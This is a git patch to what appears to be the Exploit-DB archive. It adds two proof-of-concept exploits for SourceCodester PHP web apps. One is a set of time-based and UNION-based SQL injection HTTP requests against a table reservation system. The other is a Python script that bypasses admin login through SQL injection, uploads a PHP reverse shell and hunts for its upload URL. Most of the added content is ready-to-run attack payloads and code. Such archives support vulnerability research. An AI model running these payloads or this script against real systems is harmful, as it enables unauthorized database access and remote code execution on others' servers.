From 302d11bcbf035ff7742fe8f06534a9638ddecd8c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 4 Nov 2020 05:02:02 +0000 Subject: [PATCH] DB: 2020-11-04 2 changes to exploits/shellcodes Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution --- exploits/php/webapps/48984.txt | 50 +++++++++++++++++++++++++++++++ exploits/php/webapps/48985.txt | 54 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 106 insertions(+) create mode 100644 exploits/php/webapps/48984.txt create mode 100644 exploits/php/webapps/48985.txt diff --git a/exploits/php/webapps/48984.txt b/exploits/php/webapps/48984.txt new file mode 100644 index 000000000..dcce793f2 --- /dev/null +++ b/exploits/php/webapps/48984.txt @@ -0,0 +1,50 @@ +# Title: Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection +# Exploit Author: yunaranyancat +# Date: 02-11-2020 +# Vendor Homepage: www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip +# Version: 1.0 +# Tested On: Ubuntu 18.04 + XAMPP + +# Description + +The file view-chair-list.php does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. +An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. + +# POC N°1 = Time based blind SQLi + +GET /TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1 +Host: [TARGET IP/URL] +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +### Server will sleep for 10 seconds before returning the response + +# POC N° 2 = UNION based SQLi + +### Request (getting current user) + +GET /TableReservation/dashboard/view-chair-list.php?table_id=%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176787071%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x71716b7071%29%2CNULL%2CNULL--%20- HTTP/1.1 +Host: [TARGET IP/URL] +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +Content-Length: 2 + +### Response + +... + +Delete Chair +... \ No newline at end of file diff --git a/exploits/php/webapps/48985.txt b/exploits/php/webapps/48985.txt new file mode 100644 index 000000000..4705d12ed --- /dev/null +++ b/exploits/php/webapps/48985.txt @@ -0,0 +1,54 @@ +# Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution +# Date: 3-11-2020 +# Exploit Author: mosaaed +# Vendor Homepage: https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip +# Version: 1.0 +# Tested on: Parrot 5.5.17 + Apache 2.4.46 +# CVE ID : N/A + +# replace shell.php with your own php reverse shell +# change [TARGET URL] to target URL or IP address +# setup your netcat listener for sum good ol shellz + + + +#!/usr/bin/python3 + +import requests +import time + +def sqli_admin(): + s = requests.Session() + data = {"username":"admin'or'1'=1#","password":"hacked"} + adminlogin = "http://localhost/crms/admin/ajax.php?action=save_settings" + s.post(adminlogin,data=data) + return s + +def trigger_rce(session): + starttime = int(time.time()) + multipart_form_data = { + "name": ("cyberscurity"), + "email": ("test@test.com"), + "contact" : ("+11111111111"), + "about" : ("Nothing much about it"), + "img" : ("shell.php", open("shell.php", "rb")) + } + session.post("http://localhost/crms/admin/ajax.php?action=save_settings", files=multipart_form_data) + get_shell(starttime-100,starttime+100,session) + + +def get_shell(start,end,session): + for i in range(start,end): + session.get("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php") + response = requests.get ("http://localhost/crms/admin/assets/uploads/"+ str(i) +"_shell.php") + if response.status_code == 200: + print("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php") + + +def main(): + session = sqli_admin() + trigger_rce(session) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7c8f43cbd..a35570bc9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40802,6 +40802,8 @@ id,file,description,date,author,type,platform,port 48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 5.4 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php, 48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php, 48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php, +48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php, +48985,exploits/php/webapps/48985.txt,"Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,